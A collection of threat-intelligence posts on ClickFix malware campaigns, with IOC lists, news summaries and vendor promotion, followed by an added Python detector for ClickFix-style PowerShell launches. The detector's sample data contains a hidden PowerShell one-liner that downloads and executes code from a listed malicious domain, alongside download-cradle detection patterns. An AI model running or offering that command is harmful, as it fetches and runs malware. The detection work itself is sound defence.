2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity

SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:

- hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
- hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
- hxxps[:]//vividanchorlab[.]top/auth/routerr-client.js

TRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:

- hxxp[:]//178.156.222[.]131/
- hxxp[:]//5.78.144[.]156/
- hxxps[:]//astralharborworks[.]com/ground

SHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:

- 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20

POST-INFECTION C2 TRAFFIC:

- tcp://89.110.110[.]119:443

cc: @monitorsg

🚨 Legitimate B2B Websites Abused for Fileless Malware Delivery: Detect It Early
We’re tracking widespread #ClickFix activity using compromised legitimate websites to deliver fileless malware, lowering suspicion and delaying detection.

⚠️ Finance, banking, healthcare, manufacturing, and tech are among the most exposed industries.

❗️ The activity looks low-risk until fileless execution and outbound C2 traffic are already established. Attackers inject a lightweight inline JavaScript loader into compromised sites, which retrieves a second-stage payload directly into the victim’s browser from external infrastructure.

The attack chain blends into normal web traffic, relies on PowerShell and in-memory execution, and later shifts C2 communication into the legitimate system process svchost.exe, making malicious activity harder to distinguish from routine system behavior for SOC and MSSP teams.

⚡️ #ANYRUN Sandbox helps teams validate suspicious activity faster and contain fileless attacks before they escalate. Analysts can observe the full execution chain in real time:
Inline JS loader ➡️ User-executed PowerShell (IEX/IRM) ➡️ Hidden second-stage PowerShell and loader retrieval ➡️ Fileless in-memory execution inside powershell.exe ➡️ Follow-on .NET payload delivery ➡️ svchost.exe injection ➡️ Custom TCP C2 🚨

👨‍💻 Learn how #ANYRUN helps security teams detect complex threats and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoenterprise&utm_term=200526

📈 Scale your SOC with solutions trusted by 74 Fortune 100 companies. Get an exclusive 10th anniversary deal for your team: https://app.any.run/plans/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix_fileless_malware&utm_content=linktoplans&utm_term=200526

IOCs:
/jsrepo?rnd=
/teamrepo?rnd=

ntdnewtds[.]shop
dnsnewtds[.]shop
sdntds[.]shop
newtdsone[.]shop
nttdss[.]shop
Dntds[.]shop

178[.]16[.]52[.]232
158[.]94[.]208[.]92
158[.]94[.]208[.]104
91[.]92[.]243[.]161

#cybersecurity #infosec

Cybercriminals Leverage ClickFix with PySoxy for Persistent Attacks

Cybercriminals are using a potent combination of ClickFix and PySoxy to launch persistent attacks, with experts warning that their deliberate preparation shows a sinister intent for continued access. This sophisticated tactic allows attackers to survive removal attempts and endpoint blocks, making it a major threat.

https://osintsights.com/cybercriminals-leverage-clickfix-with-pysoxy-for-persistent-attacks?utm_source=mastodon&utm_medium=social

#Clickfix #Pysoxy #SocialEngineering #PersistentAttacks #MalwareOperations

New "Claude Code on Mac" ClickFix malware campaign targeting macOS, using Google ads and legitimate shared Claude chats

#ciberseguridad #macOSSecurity #IA #ClickFix

https://mecambioamac.com/campana-clickfix-para-macos-usando-google-ads-y-chats-legitimos-de-claude/

Microsoft has identified three variants of #ClickFix attacks targeting #macOS systems. These threats install infostealers capable of evading security defenses in order to steal sensitive data.

Punto Informatico: ClickFix: Microsoft discovers new attacks against macOS

Microsoft has described three ClickFix attacks that install infostealers for macOS capable of bypassing protections and stealing a wide range of sensitive data.

#ClickFix #Microsoft

https://www.punto-informatico.it/clickfix-microsoft-scopre-nuovi-attacchi-contro-macos/

'ClickFix' attack tricks users into hacking themselves, ACSC warns:

"Verify that you are human" prompt used to deliver Vidar Stealer malware.

The Australian Cyber Security Centre (ACSC) has stepped in to warn users of an active attack campaign targeting Windows users with Vidar Stealer malware, which is delivered through the so-called ClickFix social engineering technique.

🤷 https://www.itnews.com.au/news/clickfix-attack-tricks-users-into-hacking-themselves-acsc-warns-625692

#clickfix #acsc #malware #vidar #stealing #VidarStealer #australia #socialengineering

Microsoft researchers warn of a new #ClickFix campaign targeting macOS with fake guides on Medium and Craft to deploy AMOS and SHub Stealer via Terminal commands.

Read: https://hackread.com/fake-macos-troubleshooting-sites-steal-icloud-clickfix/

#CyberSecurity #macOS #AMOS #SHubStealer #Scam

Australia warns of ClickFix attacks pushing Vidar Stealer malware

The Australian Cyber Security Center (ACSC) is warning organizations of an ongoing malware campaign using the ClickFix social engineering technique to distribute the Vidar Stealer info-stealing malware.

BleepingComputer

You visit the student festival (juwenalia) website... and get a surprise like this [possible malware infection]

Patryk sent us information about an infection of the site rzeszowskiejuwenalia[.]pl. Our reader visited the site and was met with this view: the image itself does not reveal much yet, but... after clicking, the page asked the user to press, in sequence, Windows+R, Ctrl+V and Enter. What is technically going on here? After clicking "I'm not a robot", the page...

#WBiegu #Awareness #Clickfix #Infekcja #Malware #Socjotechnika

https://sekurak.pl/wchodzisz-na-strone-juwenaliow-a-tu-taka-niespodzianka-mozliwa-infekcja-malware/

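The ANY.RUN post above describes the execution chain (a user-pasted PowerShell one-liner with IEX/IRM, a hidden window, retrieval from the listed hosts) and the Sekurak post describes the user-side mechanism (Win+R, Ctrl+V, Enter, which launches the interpreter under explorer.exe). The following Python is an added example, not code from ANY.RUN, malware-traffic-analysis.net or Sekurak: it scores Sysmon EventID 1-style process-creation records for exactly that launch pattern. The IOC hosts and URL path prefixes are the ones listed in the ANY.RUN post; the event records, the `intranet.example` host and the alert threshold are constructed for the example.

```python
"""Triage process-creation records for ClickFix-style launches (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Network IOCs copied from the ANY.RUN post above, re-fanged for matching.
IOC_HOSTS = {
    "ntdnewtds.shop", "dnsnewtds.shop", "sdntds.shop",
    "newtdsone.shop", "nttdss.shop", "dntds.shop",
    "178.16.52.232", "158.94.208.92", "158.94.208.104", "91.92.243.161",
}
IOC_PATH_PREFIXES = ("/jsrepo?rnd=", "/teamrepo?rnd=")

# Interpreters a ClickFix lure typically has the victim run from the Run dialog.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Download cradles seen in ClickFix one-liners (IEX/IRM and their long forms).
DOWNLOAD_CRADLE = re.compile(
    r"\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|curl|wget)\b", re.IGNORECASE)
# "-w hidden", "-WindowStyle Hidden", "-w h"
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
# Capture host and path of any URL in the command line.
URL = re.compile(r"https?://([^/\s'\")]+)(/[^\s'\")]*)?", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal subset of a Sysmon EventID 1 (or Windows 4688) record."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the ClickFix indicators present in one event (empty = nothing of note)."""
    reasons: list[str] = []
    if _basename(ev.image) not in INTERPRETERS:
        return reasons
    if _basename(ev.parent_image) == "explorer.exe":
        # Win+R / Run dialog launches appear as children of explorer.exe.
        reasons.append("interpreter spawned by explorer.exe (Win+R / Run dialog)")
    if HIDDEN_WINDOW.search(ev.command_line):
        reasons.append("hidden window requested")
    if DOWNLOAD_CRADLE.search(ev.command_line):
        reasons.append("download cradle (IEX/IRM-style)")
    for host, path in URL.findall(ev.command_line):
        host = host.lower().split("@")[-1].split(":")[0]  # strip userinfo / port
        if host in IOC_HOSTS:
            reasons.append(f"known IOC host {host}")
        if path and path.startswith(IOC_PATH_PREFIXES):
            reasons.append(f"known IOC path {path.split('=')[0]}=")
    return reasons


def triage(events: list[ProcessEvent], threshold: int = 2) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event with at least `threshold` indicators."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((i, reasons))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent(  # the ClickFix paste: Win+R, Ctrl+V, Enter
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell -w hidden -c "iex (irm https://ntdnewtds.shop/jsrepo?rnd=8812)"'),
    ProcessEvent(  # a developer fetching a script from an editor terminal: one indicator only
        r"C:\Program Files\Microsoft VS Code\Code.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell -NoProfile -Command "Invoke-WebRequest https://intranet.example/build.ps1 -OutFile build.ps1"'),
    ProcessEvent(  # a plain Run-dialog command: one indicator only
        r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcessEvent(  # not an interpreter: ignored
        r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

Only the first record crosses the threshold; the other two interpreter launches carry a single indicator each, which is the trade-off the threshold encodes (lower it to 1 to catch any explorer.exe-launched interpreter, at the cost of noise from ordinary Run-dialog use). In production you would feed Sysmon EventID 1 or Windows 4688 records into `score_event`, and the HKCU `...\Explorer\RunMRU` key on the endpoint corroborates a Win+R paste after the fact.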